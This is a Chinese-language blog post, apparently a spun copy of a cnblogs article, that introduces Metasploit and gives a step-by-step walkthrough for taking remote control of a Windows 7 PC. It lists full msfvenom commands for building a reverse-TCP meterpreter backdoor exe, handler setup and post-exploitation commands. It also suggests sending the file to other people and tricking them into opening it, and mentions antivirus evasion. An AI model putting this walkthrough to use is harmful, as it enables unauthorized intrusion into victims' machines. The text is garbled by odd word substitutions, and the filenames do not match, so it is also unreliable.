如下图所示 现在就可以操作别人电脑了

时间:2021-11-23 02:20:51

 注:只是测试,,不成干违法的事。

一、metaspolit工具的介绍

1.1、metaspolit 是一款开源安适缝隙检测工具,附带数百个已知的软件缝隙,并连结频繁更新。被安适社区冠以“可以黑失整个宇宙”之名的强大渗透测试框架。

1.2、Metasploit是一款开源的安适缝隙检测工具,同时Metasploit是免费的工具,因此安适事情人员常用Metasploit工具来检测系统的安适性。

1.3、Metasploit Framework (MSF) 在2003年以开放源码方法颁布,是可以*获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和缝隙研究供给了一个可靠         平台

1.4、这种可以扩展的模型将负载控制(payload)、编码器(encode)、无操纵生成器(nops)和缝隙整合在一起,使 Metasploit Framework 成为一种研究高危缝隙的途径。它集成了各平台上常见的溢露马脚和风行的 shellcode          并且不停更新。

二、专业术语

渗透测试(Exploit):指由打击者或渗透测试者操作一个系统、应用或处事中的安适缝隙,所进行的打击行为。能够进行打击并得到方针系统控制权的恶意代码。经典的exploit由payload和injector(注入措施)构成,payload卖力取得系统的控制权,而注入措施卖力将payload打针到相应的有缝隙的系统中;

打击载荷(Payload):是我们期望方针系统在被渗透打击之后执行的代码。其实就是广义上的Shellcode,被翻译为‘有效载荷’

shellcode ::打击措施的核心代码,能够取得系统的打击权,一把是取得一个shell。是在渗透打击时作为打击载荷运行的一组机器指令,凡是用汇编语言编写。injector:相对shellcode来说,它实现加载和发送shellcode,供给返回地点等成果;

模块(Module):指Metaspolit框架中所使用的一段软件代码组件,可用于倡议渗透打击或者行某些帮助打击。

 auxiliary

encoders

exploits 

nops 

payloads 

post 

监听器(Listener):是metaspolit顶用来期待网络连接的组件。

二、metaspolit工具的简单使用

三、小尝试:操作metaspolit工具渗透win7电脑

流程如下:

1、使用工具:kail Linux 系统(IP:192.168.31.54) 

       win7 系统(IP:192.168.31.136)

2、法式:  

1、首先在kali上制作一个后门措施。文件名为:openme.exe 命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.54 LPORT=5050 -f exe -o setup.exe #本地监听地点及端标语:192.168.31.54:5050 2、为生成的文件 openme.exe 赋予可执行的权限,如果有须要可以对该文件执行免杀 命令: chmod 777 openme.exe 3、打开msf,加载exploit/multi/handler模块,同时设置本田主机地点,本地端口 命令:msfconsole msf > use exploit/multi/handler msf exploit(handler) > set lhost 192.168.31.54 msf exploit(handler) > set lport 5050 4、开始执行渗透打击并监听 命令: msf exploit(handler) > exploit -z -j 5、此时,你可以将文件发给其他人,操作社会工程学常识让别人在他的win7系统上打开该文件,那么你的目的就到达了 6、后门措施反向连接到msf,msf倡议第二次打击(开始渗透),然后客户端(后门措施)连接随处事端(msf)。 如图你在你kali上会有一个session。你攻下了别人的主机并拿到了shell,还有session信息。 命令: msf exploit(handler) > sessions msf exploit(handler) > sessions -i 1 meterpreter > shell 7、入侵告成之后可操纵win7电脑 getsystem #会自动操作各类百般的系统缝隙来进行权限提升 migrate #进程id进程迁移 background #把当前的会话设置为配景,需要的时候在启用 getuid #检察对方正在运行的用户 ps #列出所有的进程 getpid #返回运行meterpreter的id号 sysinfo #产看系统信息和体系布局 shell #切换到cmd的系统权限方法

3、运行功效截图

检察本地的IP

 

如下图所示 现在就可以操作别人电脑了

用msfvenom生成exe文件

如下图所示 现在就可以操作别人电脑了

启动metaspolit

如下图所示 现在就可以操作别人电脑了

设置本地IP地点和端口并且打击

如下图所示 现在就可以操作别人电脑了

当对方打开exe文件的时候,会生成一个session会话,如下图所示

如下图所示 现在就可以操作别人电脑了

此刻就可以操纵别人电脑了,如下图:

如下图所示 现在就可以操作别人电脑了

kail linux 系统下操作metaspolit工具渗透win7电脑

标签:

原文地点:https://www.cnblogs.com/haiyan123/p/8981844.html

相关文章